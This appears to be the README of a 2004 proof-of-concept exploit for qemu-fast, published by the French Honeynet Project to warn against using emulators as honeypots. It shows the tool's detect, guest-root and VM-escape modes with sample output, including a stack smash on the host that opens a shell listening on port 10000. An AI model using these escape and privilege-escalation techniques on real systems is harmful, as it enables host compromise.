QEMU DETECTION AND EXPLOITATION

By for the French Honeynet Project

It is possible to break out of a Qemu jail! Do not use Qemu in 'fast' mode as a honeypot or as a jail to get an additional security layer.

This PoC exploit works on qemu-fast, which uses the host MMU. In that mode the guest's physical memory and the qemu-fast code itself are mapped into the same address space as the guest's own processes, which is what the three commands below rely on. Tested on qemu 0.6.0 (July 2004) with a guest Red Hat 8 system.

Important: although it works 10 times out of 10 on my test system, this is only a Proof of Concept intended to show the dangers of using Virtual Machines or Emulators to set up Honeypots. There is a lot of room for improvement if you want to use it reliably on other systems.

-----
USAGE
-----

$ ./q
Fun with Qemu by for the FHP (qemu-fast only)
Usage:
  ./q detect    tell if we are running inside a Qemu system
  ./q root      get a root shell in the guest system
  ./q break     break out of Qemu (execute code in the host system)

---------
DETECTION
---------

$ ./q detect
Fun with Qemu by for the FHP (qemu-fast only)
Very basic Qemu fingerprint: is the address 0xac000000 readable ?
** Qemu detected ! **

------------------
GUEST ROOT EXPLOIT
------------------

$ ./q root
Fun with Qemu by for the FHP (qemu-fast only)
Trying to write to the guest kernel, by accessing the physical memory of the whole guest system.
This will work only if it is located at address ac000000. Otherwise, please modify the QEMU_PHYSMEM define in the source.
Warning: might crash the guest system or loop forever.
Found possible task struct at address 0xb1b9a12c. Now uid/euid = 500 / 500
Found possible task struct at address 0xb1c08028. Now uid/euid = 500 / 500
Found possible task struct at address 0xb1ca412c. Now uid/euid = 500 / 500
Found possible task struct at address 0xb1fae028. Now uid/euid = 500 / 500
Found possible task struct at address 0xb1fb412c. Now uid/euid = 0 / 0
sh-2.05b#

--------------------
BREAKING OUT OF QEMU
--------------------

$ ./q break
Fun with Qemu by for the FHP (qemu-fast only)
Looking for the address of our shellcode in physical memory...
found at address 0xb1935580
Looking for the address of the qemu-fast executable code...
found at address 0xa8000000
Now smashing the stack of the Qemu process in the host system.

=> Here the assembly code in the 'shellcode' variable should have been launched on the *host* system, with the privileges of the qemu-fast process. In this PoC exploit, this code launches a shell listening on port 10000.

[EOF]